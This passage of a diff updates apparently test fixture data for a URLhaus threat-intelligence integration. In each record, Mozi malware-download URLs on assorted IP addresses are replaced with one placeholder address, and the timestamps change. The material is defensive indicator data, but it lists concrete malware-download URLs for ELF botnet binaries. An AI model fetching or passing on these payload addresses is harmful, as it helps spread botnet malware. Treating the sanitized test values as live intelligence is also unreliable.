listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13760,18 +13760,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.227.162.7:33790/Mozi.m", + "original": "http://89.160.20.156:33790/Mozi.m", "scheme": "http", "port": 33790, - "domain": "42.227.162.7", - "full": "http://42.227.162.7:33790/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33790/Mozi.m" }, - "ip": "42.227.162.7" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693581711Z", - "original": "{\"id\":\"961260\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961260/\",\"url\":\"http://42.227.162.7:33790/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.227.162.7\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026547400Z", + "original": "{\"id\":\"961260\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961260/\",\"url\":\"http://89.160.20.156:33790/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13809,18 +13809,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://219.157.26.241:58919/Mozi.m", + "original": "http://89.160.20.156:58919/Mozi.m", "scheme": "http", "port": 58919, - "domain": "219.157.26.241", - "full": "http://219.157.26.241:58919/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58919/Mozi.m" }, - "ip": "219.157.26.241" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693584927Z", - "original": "{\"id\":\"961261\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961261/\",\"url\":\"http://219.157.26.241:58919/Mozi.m\",\"url_status\":\"online\",\"host\":\"219.157.26.241\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026554300Z", + "original": "{\"id\":\"961261\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961261/\",\"url\":\"http://89.160.20.156:58919/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13858,18 +13858,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.93.21.48:40395/Mozi.m", + "original": "http://89.160.20.156:40395/Mozi.m", "scheme": "http", "port": 40395, - "domain": "59.93.21.48", - "full": "http://59.93.21.48:40395/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40395/Mozi.m" }, - "ip": "59.93.21.48" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693588233Z", - "original": "{\"id\":\"961262\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961262/\",\"url\":\"http://59.93.21.48:40395/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.21.48\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026561200Z", + "original": "{\"id\":\"961262\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961262/\",\"url\":\"http://89.160.20.156:40395/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13907,18 +13907,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.92.216.111:53510/Mozi.m", + "original": "http://89.160.20.156:53510/Mozi.m", "scheme": "http", "port": 53510, - "domain": "59.92.216.111", - "full": "http://59.92.216.111:53510/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53510/Mozi.m" }, - "ip": "59.92.216.111" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693591770Z", - "original": "{\"id\":\"961263\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961263/\",\"url\":\"http://59.92.216.111:53510/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.92.216.111\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026568100Z", + "original": "{\"id\":\"961263\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961263/\",\"url\":\"http://89.160.20.156:53510/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13956,18 +13956,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://183.17.147.46:39115/Mozi.m", + "original": "http://89.160.20.156:39115/Mozi.m", "scheme": "http", "port": 39115, - "domain": "183.17.147.46", - "full": "http://183.17.147.46:39115/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39115/Mozi.m" }, - "ip": "183.17.147.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693594835Z", - "original": "{\"id\":\"961258\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961258/\",\"url\":\"http://183.17.147.46:39115/Mozi.m\",\"url_status\":\"online\",\"host\":\"183.17.147.46\",\"date_added\":\"2021-01-14 19:05:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026575Z", + "original": "{\"id\":\"961258\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961258/\",\"url\":\"http://89.160.20.156:39115/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14005,18 +14005,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.14.93.124:40713/Mozi.m", + "original": "http://89.160.20.156:40713/Mozi.m", "scheme": "http", "port": 40713, - "domain": "123.14.93.124", - "full": "http://123.14.93.124:40713/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40713/Mozi.m" }, - "ip": "123.14.93.124" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693597971Z", - "original": "{\"id\":\"961257\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961257/\",\"url\":\"http://123.14.93.124:40713/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.93.124\",\"date_added\":\"2021-01-14 19:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026582Z", + "original": "{\"id\":\"961257\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961257/\",\"url\":\"http://89.160.20.156:40713/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14054,18 +14054,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.59.195.56:54811/Mozi.m", + "original": "http://89.160.20.156:54811/Mozi.m", "scheme": "http", "port": 54811, - "domain": "182.59.195.56", - "full": "http://182.59.195.56:54811/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54811/Mozi.m" }, - "ip": "182.59.195.56" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693601107Z", - "original": "{\"id\":\"961256\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961256/\",\"url\":\"http://182.59.195.56:54811/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.59.195.56\",\"date_added\":\"2021-01-14 19:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026588700Z", + "original": "{\"id\":\"961256\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961256/\",\"url\":\"http://89.160.20.156:54811/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14103,18 +14103,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://153.37.155.55:58269/Mozi.a", + "original": "http://89.160.20.156:58269/Mozi.a", "scheme": "http", "port": 58269, - "domain": "153.37.155.55", - "full": "http://153.37.155.55:58269/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58269/Mozi.a" }, - "ip": "153.37.155.55" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693604473Z", - "original": "{\"id\":\"961255\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961255/\",\"url\":\"http://153.37.155.55:58269/Mozi.a\",\"url_status\":\"online\",\"host\":\"153.37.155.55\",\"date_added\":\"2021-01-14 19:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026595700Z", + "original": "{\"id\":\"961255\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961255/\",\"url\":\"http://89.160.20.156:58269/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14152,18 +14152,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.14.95.248:47985/Mozi.m", + "original": "http://89.160.20.156:47985/Mozi.m", "scheme": "http", "port": 47985, - "domain": "123.14.95.248", - "full": "http://123.14.95.248:47985/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47985/Mozi.m" }, - "ip": "123.14.95.248" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693607680Z", - "original": "{\"id\":\"961251\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961251/\",\"url\":\"http://123.14.95.248:47985/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.95.248\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026602600Z", + "original": "{\"id\":\"961251\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961251/\",\"url\":\"http://89.160.20.156:47985/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14201,18 +14201,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://185.106.46.2:38107/Mozi.m", + "original": "http://89.160.20.156:38107/Mozi.m", "scheme": "http", "port": 38107, - "domain": "185.106.46.2", - "full": "http://185.106.46.2:38107/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38107/Mozi.m" }, - "ip": "185.106.46.2" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693610886Z", - "original": "{\"id\":\"961252\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961252/\",\"url\":\"http://185.106.46.2:38107/Mozi.m\",\"url_status\":\"online\",\"host\":\"185.106.46.2\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026609500Z", + "original": "{\"id\":\"961252\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961252/\",\"url\":\"http://89.160.20.156:38107/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14250,18 +14250,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.14.180.59:50354/Mozi.m", + "original": "http://89.160.20.156:50354/Mozi.m", "scheme": "http", "port": 50354, - "domain": "123.14.180.59", - "full": "http://123.14.180.59:50354/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50354/Mozi.m" }, - "ip": "123.14.180.59" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693614072Z", - "original": "{\"id\":\"961253\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961253/\",\"url\":\"http://123.14.180.59:50354/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.180.59\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026616400Z", + "original": "{\"id\":\"961253\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961253/\",\"url\":\"http://89.160.20.156:50354/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14299,18 +14299,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://190.140.131.14:44987/Mozi.m", + "original": "http://89.160.20.156:44987/Mozi.m", "scheme": "http", "port": 44987, - "domain": "190.140.131.14", - "full": "http://190.140.131.14:44987/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44987/Mozi.m" }, - "ip": "190.140.131.14" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693617408Z", - "original": "{\"id\":\"961254\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961254/\",\"url\":\"http://190.140.131.14:44987/Mozi.m\",\"url_status\":\"online\",\"host\":\"190.140.131.14\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026623400Z", + "original": "{\"id\":\"961254\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961254/\",\"url\":\"http://89.160.20.156:44987/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14348,18 +14348,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.43.33.108:44681/Mozi.m", + "original": "http://89.160.20.156:44681/Mozi.m", "scheme": "http", "port": 44681, - "domain": "125.43.33.108", - "full": "http://125.43.33.108:44681/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44681/Mozi.m" }, - "ip": "125.43.33.108" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693620744Z", - "original": "{\"id\":\"961249\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961249/\",\"url\":\"http://125.43.33.108:44681/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.43.33.108\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026630200Z", + "original": "{\"id\":\"961249\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961249/\",\"url\":\"http://89.160.20.156:44681/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14397,18 +14397,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.14.65.211:58391/Mozi.m", + "original": "http://89.160.20.156:58391/Mozi.m", "scheme": "http", "port": 58391, - "domain": "123.14.65.211", - "full": "http://123.14.65.211:58391/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58391/Mozi.m" }, - "ip": "123.14.65.211" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693624030Z", - "original": "{\"id\":\"961250\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961250/\",\"url\":\"http://123.14.65.211:58391/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.65.211\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026637200Z", + "original": "{\"id\":\"961250\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961250/\",\"url\":\"http://89.160.20.156:58391/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14446,18 +14446,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://117.194.164.34:48540/Mozi.a", + "original": "http://89.160.20.156:48540/Mozi.a", "scheme": "http", "port": 48540, - "domain": "117.194.164.34", - "full": "http://117.194.164.34:48540/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48540/Mozi.a" }, - "ip": "117.194.164.34" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693627256Z", - "original": "{\"id\":\"961248\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961248/\",\"url\":\"http://117.194.164.34:48540/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.194.164.34\",\"date_added\":\"2021-01-14 19:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026644100Z", + "original": "{\"id\":\"961248\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961248/\",\"url\":\"http://89.160.20.156:48540/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14495,18 +14495,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.48.13.187:42755/Mozi.m", + "original": "http://89.160.20.156:42755/Mozi.m", "scheme": "http", "port": 42755, - "domain": "115.48.13.187", - "full": "http://115.48.13.187:42755/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42755/Mozi.m" }, - "ip": "115.48.13.187" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693630593Z", - "original": "{\"id\":\"961246\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961246/\",\"url\":\"http://115.48.13.187:42755/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.13.187\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026651100Z", + "original": "{\"id\":\"961246\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961246/\",\"url\":\"http://89.160.20.156:42755/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14544,18 +14544,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.87.249.28:52688/Mozi.m", + "original": "http://89.160.20.156:52688/Mozi.m", "scheme": "http", "port": 52688, - "domain": "113.87.249.28", - "full": "http://113.87.249.28:52688/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52688/Mozi.m" }, - "ip": "113.87.249.28" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693633919Z", - "original": "{\"id\":\"961247\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961247/\",\"url\":\"http://113.87.249.28:52688/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.87.249.28\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026658100Z", + "original": "{\"id\":\"961247\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961247/\",\"url\":\"http://89.160.20.156:52688/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14593,18 +14593,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://112.30.110.63:33782/Mozi.m", + "original": "http://89.160.20.156:33782/Mozi.m", "scheme": "http", "port": 33782, - "domain": "112.30.110.63", - "full": "http://112.30.110.63:33782/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33782/Mozi.m" }, - "ip": "112.30.110.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693637475Z", - "original": "{\"id\":\"961244\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961244/\",\"url\":\"http://112.30.110.63:33782/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.30.110.63\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026665Z", + "original": "{\"id\":\"961244\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961244/\",\"url\":\"http://89.160.20.156:33782/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14642,18 +14642,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.133.225.154:50381/Mozi.m", + "original": "http://89.160.20.156:50381/Mozi.m", "scheme": "http", "port": 50381, - "domain": "113.133.225.154", - "full": "http://113.133.225.154:50381/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50381/Mozi.m" }, - "ip": "113.133.225.154" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693641343Z", - "original": "{\"id\":\"961245\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961245/\",\"url\":\"http://113.133.225.154:50381/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.133.225.154\",\"date_added\":\"2021-01-14 19:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026673900Z", + "original": 